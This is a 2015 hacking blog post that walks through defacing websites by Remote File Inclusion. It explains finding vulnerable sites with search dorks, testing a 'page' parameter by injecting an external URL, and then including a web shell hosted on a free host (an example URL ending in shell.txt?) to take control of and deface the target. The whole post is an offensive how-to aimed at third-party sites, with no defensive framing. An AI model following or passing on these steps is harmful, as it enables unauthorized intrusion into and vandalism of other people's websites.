download

Download link

Monday, 16 March 2015

Defacing via RFI (Remote File Inclusion)


Hello again,
today I'm going to show you how RFI process goes Step By Step Smile
#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them Tongue




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#]Searching for Vuln. sites:

We can find Vuln.websites by using Google DorkS

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#]Checking if they are Vuln. :
Now after we searched for sites on google, many sites will show but not all of them are Vuln.
so how can we check? Tongue

after opening the site check the link, for example it will be like:

http://www.tagert.com/index.php?page=ANYTHING

now to check the site we should replace "ANYTHING" with "http://www.google.com" Smile

so it will be like :

http://www.tagert.com/index.php?page=htt...google.com

IF google home page showed up then the website is Vuln. for RFI,
IF not then fine another one Tongue




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[#]Defacing:

OK, now if we found a Vuln. website how to deface? o_O

well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAPMLE it will be:
http://www.yourfreehost.com/shell.txt

http://www.tagert.com/index.php?page=htt...shell.txt?

[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL Tongue Big Grin

Now your shell will show so Deface the site Tongue

happy h@cking

No comments:

Post a Comment